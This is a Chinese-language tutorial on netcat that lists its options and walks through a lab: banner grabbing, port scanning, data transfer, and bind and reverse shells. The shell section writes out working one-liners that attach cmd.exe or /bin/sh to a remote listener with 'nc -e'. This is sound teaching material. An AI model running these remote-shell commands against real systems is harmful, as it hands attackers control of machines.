NC的简单使用 – 作者:Amada丶My

什么是NC:

nc是netcat的简写,有着网络界的瑞士军dao美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具

NC的作用:

1.实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口

2.端口的扫描,nc可以作为client发起TCP或UDP连接

3.机器之间传输文件

4.机器之间网络测速

NC的常用参数如下:

-g<网关> 设置路由器跃程通信网关,最多可设置8个。

-G<指向器数目> 设置来源路由指向器,其数值为4的倍数。

-h 在线帮助。

-i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。

-l 使用监听模式,管控传入的资料。

-n 直接使用IP地址,而不通过域名服务器。

-o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。

-p<通信端口> 设置本地主机使用的通信端口。

-r 乱数指定本地与远端主机的通信端口。

-s<来源地址> 设置本地主机送出数据包的IP地址。

-u 使用UDP传输协议。

-v 显示指令执行过程。

-w<超时秒数> 设置等待连线的时间。

-z 使用0输入/输出模式,只在扫描通信端口时使用。

实验环境:

操作系统                                IP

win7(vps)                           192.168.123.11

web服务器                              192.168.123.18

(PS:首先要进入nc目录下)

1.抓取banner信息:

nc -nv 192.168.123.11 21   未启用

nc -nv 192.168.123.11 445   启用

1621241611_60a22f0b8fcd97f547139.png!small?1621241612217

2.端口扫描(不推荐,效率不高很慢,多端口基本等于卡死)

nc -v 192.168.123.11 80

nc -v 192.168.123.11 445

1621241625_60a22f1934fb2b8cc74f3.png!small?1621241625427

3.简单传输数据

vps:nc.exe -l -p 8888

web服务器:nc.exe -vn 192.168.128.11 8888

1621241653_60a22f355fde4f2a683a3.png!small?1621241653643

1621241660_60a22f3c25ca601acf0a9.png!small?1621241660313

4.反弹shell

shell分为正向shell,另一种为反向shell。

反向shell一般在开启了防护措施的服务器上使用。

1)正向shell

vps链接目标主机

web服务器下:nc.exe -lvp 4444 -e c:\windows\system32\cmd.exe

(linux下:nc x.x.x.x 4444 -e /bin/sh #Linux)

(注意是小写l,不是数字1。 -lvp:监听模式启用,可视过程,设置端口)

1621241675_60a22f4bc7ccf5b8c8c69.png!small?1621241676092

vps接收:nc.exe 192.168.123.8 4444

1621241679_60a22f4f45364cb48187c.png!small?1621241679413

2)反向shell

在vps上做监听:nc.exe -lvp 4444

1621241684_60a22f54759322ab9dafb.png!small?1621241684538

在web服务器上进行反弹:nc.exe 192.168.123.11 4444 -e c:\windows\system32\cmd.exe

(linux下:nc x.x.x.x 4444 -e /bin/sh #Linux))

1621241689_60a22f598ad9c7c00fab3.png!small?1621241689706

结果:

1621241693_60a22f5d68eaf251143a2.png!small?1621241693554

同样感谢余师傅的虚拟机

不同的环境会有一些不同的问题,欢迎讨论,随时编辑补充。

来源:freebuf.com 2021-05-17 17:08:15 by: Amada丶My

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论